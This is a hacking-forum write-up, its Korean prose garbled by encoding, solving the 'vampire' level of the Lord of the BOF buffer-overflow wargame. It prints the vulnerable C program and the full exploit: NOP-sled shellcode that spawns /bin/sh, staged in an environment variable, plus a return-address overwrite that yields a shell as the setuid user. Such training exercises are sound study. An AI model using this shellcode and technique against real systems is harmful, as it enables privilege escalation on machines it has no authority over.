1617, 77/81 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ÇØÅ·ÀßÇϰí½Í´Ù
   http://¾øÀ½
   troll.txt (2.1 KB), Download : 18     [¿À¸¥ÂÊ ¹öư ´­·¯ ´Ù¿î ¹Þ±â]
   [L.O.B ¿øÁ¤´ë] - troll

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8611 [º¹»ç]


[troll@localhost troll]$ bash2
[troll@localhost troll]$ ls -al
total 44
drwx------    2 troll    troll        4096 Mar 29  2010 .
drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..
-rw-r--r--    1 troll    troll          24 Mar  1  2010 .bash_logout
-rw-r--r--    1 troll    troll         230 Mar  1  2010 .bash_profile
-rw-r--r--    1 troll    troll         124 Mar  1  2010 .bashrc
-rwxr-xr-x    1 troll    troll         333 Mar  1  2010 .emacs
-rw-r--r--    1 troll    troll        3394 Mar  1  2010 .screenrc
-rwsr-sr-x    1 vampire  vampire     12103 Mar  2  2010 vampire
-rw-r--r--    1 root     root          550 Mar 29  2010 vampire.c
[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}




argv[1][47]Àº "\xbf"À̸鼭 argv[1][46]Àº "\xff"°¡ µÇ¸é ¾È µÈ´Ù.
¸Ó¸´¼Ó¿¡ ¹Ù·Î ¶°¿À¸¥ »ý°¢Àº...
ȯ°æº¯¼ö¿¡ shellcode¸¦ ¿Ã·Á³õ´Âµ¥ ¾Õ¿¡ nopÀ» 10¸¸°³Á¤µµ ¿Ã·Á³õÀ¸¸é
\xff°ªÀÌ ¹Ù²îÁö ¾ÊÀ»±î ½Í¾ú´Âµ¥...







[troll@localhost troll]$ export SHELLCODE=$(python -c 'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')[troll@localhost troll]$ vi getenv.c
[troll@localhost troll]$ gcc -o getenv getenv.c
[troll@localhost troll]$ ./getenv
0xbffe7834
[troll@localhost troll]$ ./vampire `python -c 'print "\x90"*44+"\x34\x89\xfe\xbf"'`
4©­¢¯
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ my-pass
euid = 509
[???????????????]
bash$






...³Ê¹« ½±°Ô ½©À» µû¹ö·È´Ù;;
¹®Á¦ Ǫ´Âµ¥ 2~3ºÐ¹Û¿¡ ¾È °É¸²...
´ÙÀ½ ´Ü°è·Î ¤¡¤¡½Ì

  Hit : 1083     Date : 2025/07/08 07:37



    
97   ½Ã½ºÅÛ ÄÝ ÃßÀû È®ÀåÆÇ[2]     ÇØÅ·ÀßÇϰí½Í´Ù
01/19 1655
96   ¸®´ª½º À¥ ·Î±× ºÐ¼®     ÇØÅ·ÀßÇϰí½Í´Ù
05/20 1649
95   °£´ÜÇÑ ½Ã½ºÅÛ ÄÝ ÃßÀû ÇÁ·Î±×·¥ ¸¸µé±â     ÇØÅ·ÀßÇϰí½Í´Ù
01/18 1632
94   [Write Up] Crypto Cat's CTF 2024 - BabyFlow     ÇØÅ·ÀßÇϰí½Í´Ù
12/29 1579
93   ÆÄÀ̽ãÀ» ÀÌ¿ëÇÑ ½ÉÇà À¥ Å©·Ñ·¯     ÇØÅ·ÀßÇϰí½Í´Ù
08/13 1551
92   Keyboard Hooking -part2 - (Python3 ver)     ÇØÅ·ÀßÇϰí½Í´Ù
11/20 1548
91   VPNÀÌ ¿¬°áµÇ¾ú´Ù°¡ µµÁß¿¡ ²¨µµ À¥ ºê¶ó¿ìÀú»ó¿¡¼­ À¯ÁöµÇ´Â ÀÌÀ¯     ÇØÅ·ÀßÇϰí½Í´Ù
11/22 1533
90   ÇØÄ¿½ºÄ𠸸ȭÀÇ ÀÚµ¿À¸·Î ½ºÄµÇÏ´Â ÇÁ·Î±×·¥     ÇØÅ·ÀßÇϰí½Í´Ù
02/18 1524
89   ARP ½ºÇªÇÎ - Part.1 -     ÇØÅ·ÀßÇϰí½Í´Ù
04/20 1493
88   ÇØÄ¿µéÀÌ ÇØÅ·½Ã »ç¿ëÇÏ´Â µð·ºÅ丮 °ø°£[1]     ÇØÅ·ÀßÇϰí½Í´Ù
11/22 1487
87   [Windows API] Keyboard Hooking     ÇØÅ·ÀßÇϰí½Í´Ù
11/20 1442
86   http ½º´ÏÆÛ ±¸Çö     ÇØÅ·ÀßÇϰí½Í´Ù
04/20 1293
85   [L.O.B ¿øÁ¤´ë] - cobolt     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 1255
84   pcapÀ¸·Î ÆÐŶ ½º´ÏÆÛ ±¸ÇöÇϱ⠠   ÇØÅ·ÀßÇϰí½Í´Ù
04/20 1154
  [L.O.B ¿øÁ¤´ë] - troll     ÇØÅ·ÀßÇϰí½Í´Ù
07/08 1082
82   [L.O.B ¿øÁ¤´ë] - orge     ÇØÅ·ÀßÇϰí½Í´Ù
07/07 1045
81   [L.O.B ¿øÁ¤´ë] - wolfman     ÇØÅ·ÀßÇϰí½Í´Ù
07/03 1029
80   [L.O.B ¿øÁ¤´ë] - goblin     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 997
79   [L.O.B ¿øÁ¤´ë] - darkelf     ÇØÅ·ÀßÇϰí½Í´Ù
07/07 989
78   [L.O.B ¿øÁ¤´ë] - gate     ÇØÅ·ÀßÇϰí½Í´Ù
07/02 950
[1]..[71][72][73][74][75][76] 77 [78][79][80]..[81]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org